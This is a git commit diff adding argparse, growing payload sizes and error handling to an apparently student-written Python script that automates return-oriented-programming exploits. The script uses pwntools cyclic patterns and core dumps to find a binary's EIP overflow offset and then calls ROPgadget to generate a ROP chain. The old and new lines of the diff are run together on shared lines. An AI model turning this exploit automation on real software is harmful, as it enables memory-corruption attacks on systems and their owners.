Cat, argparse, payload sizes, more graceful errors

Co-authored-by: Chris Gora <34940205+ChrisGora@users.noreply.github.com>
Co-authored-by: jack bond-preston <jackbondpreston@outlook.com>
This commit is contained in:
Liam Dalgarno 2020-11-25 16:17:36 +00:00
parent 5f8099dde0
commit 99cb451194

View File

@ -1,41 +1,69 @@
from pwnlib.elf.corefile import Coredump from pwnlib.elf.corefile import Coredump
from pwnlib.util.cyclic import cyclic, cyclic_find from pwnlib.util.cyclic import cyclic, cyclic_find
from pwnlib.util.packing import pack from pwnlib.util.packing import pack
from pwnlib.tubes.process import process from pwnlib.tubes.process import process, signal
import os import os
import subprocess import subprocess
import argparse
import warnings
import ROPgadget.ropgadget
exec_name = "./vuln-32" print(r'''
_ ___ _.--. ___ _____ ______ _____ ______ ______
\`.|\..----...-'` `-._.-'_.-'` / _ \ / ____| /\ |____ / ____| /\ | ____| ____|
/ ' ` , __.--' | | | |_ _| | / \ / / | / \ | |__ | |__
)/' _/ \ `-_, / | | | \ \/ / | / /\ \ / /| | / /\ \ | __| | __|
`-'" `"\_ ,_.-;_.-\_ ', | |_| |> <| |____ / ____ \ / / | |____ / ____ \| | | |____
_.-'_./ {_.' ; / \___//_/\_\\_____/_/ \_\/_/ \_____/_/ \_\_| |______|
{_.-``-' {_/
''')
def find_offset(exec_name): arg_parser = argparse.ArgumentParser(description="Run an automated ROP on an executable")
# TODO: command line arguments arg_parser.add_argument("exec_file", metavar="exec_file", type=str, help="The executable file to exploit")
arg_parser.add_argument("--core", "--c", metavar="core_file", type=str, help="The name of the generated core file")
args = arg_parser.parse_args()
exec_file = args.exec_file
core_file = args.core
def find_offset(exec_file, core_file):
input_file = "input.txt" input_file = "input.txt"
core_file = "./core"
os.remove(core_file) try:
os.remove(core_file)
except:
pass
# TODO Loop until a crash, increase payload size each iteration payload_size = 32
with open(input_file, "wb") as f: while payload_size <= 16384:
payload = cyclic(512) print(f"[🤔] Trying payload {payload_size}...")
f.write(payload)
process([exec_name, input_file]).wait() with open(input_file, "wb") as f:
payload = cyclic(payload_size)
f.write(payload)
core = Coredump('./core') process([f"./{exec_file}", input_file]).wait()
assert pack(core.eip) in payload try:
core = Coredump(f"./{core_file}")
os.remove(input_file) if core and pack(core.eip) in payload:
offset = cyclic_find(core.eip)
print(f"[😳] Found offset at {offset}!")
return offset
except FileNotFoundError:
pass
return cyclic_find(core.eip) os.remove(input_file)
payload_size *= 2
offset = find_offset(exec_name) raise BaseException("Failed to find offset")
# print("\t# Padding goes here") <-- search for this
# print("\tp = ''\n")
result = subprocess.run(["ROPgadget", "--binary", exec_name, "--ropchain"], stdout=subprocess.PIPE) offset = find_offset(exec_file, core_file)
result = subprocess.run(["ROPgadget", "--binary", exec_file, "--ropchain"], stdout=subprocess.PIPE)
stdout = result.stdout stdout = result.stdout